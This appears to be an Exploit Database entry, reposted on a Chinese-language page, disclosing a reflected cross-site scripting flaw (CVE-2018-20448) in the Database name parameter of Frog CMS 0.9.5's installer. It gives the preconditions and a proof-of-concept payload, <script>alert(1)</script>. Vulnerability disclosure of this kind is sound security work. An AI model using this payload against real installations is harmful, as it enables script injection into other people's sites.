Frog CMS 0.9.5 – Cross-Site Scripting

• Exploit Database
• 35 阅读

• 作者： WangDudu
  日期： 2019-01-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46067/

• # Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
  # Date: 2018-12-25
  # Exploit Author:WangDudu
  # Vendor Homepage: https://github.com/philippe/FrogCMS
  # Software Link: https://github.com/philippe/FrogCMS
  # Version:0.9.5
  # CVE :CVE-2018-20448
  
  # The parameter under /install/index.php is that the Database name has reflective XSS
  # 1 The Database name , username and password must be correct
  # 2 You can use the exp: 
  
  <script>alert(1)</script>